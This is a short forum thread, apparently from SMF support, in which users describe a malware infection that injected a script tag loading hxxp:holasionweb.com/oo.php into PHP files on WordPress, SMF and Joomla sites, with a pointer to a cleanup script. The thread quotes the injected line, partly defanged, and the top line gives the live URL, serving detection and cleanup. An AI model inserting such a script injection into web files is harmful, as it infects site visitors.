http://holasionweb.com/oo.php

[plwylie]

I was having problems upgrading from 1.11 to 2.0. I was getting errors during the initial database table upgrades. The problem was malware that was installed on my site hosted by GoDaddy. I was getting virus warnings, but didn't realize it was coming from my site. The malware adds a line to PHP files and in my case prevented me from upgrading. There was a line of code appearing above the subject line in SMF posts. This line of code will be in PHP files if you are infected; <script src="hxxp:holasionweb.com/oo.php [nonactive]"></script>
If you watch as your page is loading the browser will show the browser trying to connect to the malware on the site hosting it "hxxp:holasionweb.com/oo.php%22. [nonactive]

The malware mainly affects WordPress, but as I discovered it affects SMF. There were reported cases of where it was affecting Joomla. So basically anything using PHP is at risk. I used the below site to clean my files. They have a nice little script for cleaning PHP files. Make sure to us the "u" option to update the files and remove the line of malicious code.
hxxp:www.danielansari.com/wordpress/2010/05/holasionwebcom/ [nonactive]

[Kohlteth]

I have the same problem as well as previous incarnations.

Check out this thread where others too have had similar issues please.

http://www.simplemachines.org/community/index.php?action=post;topic=377697.20;num_replies=20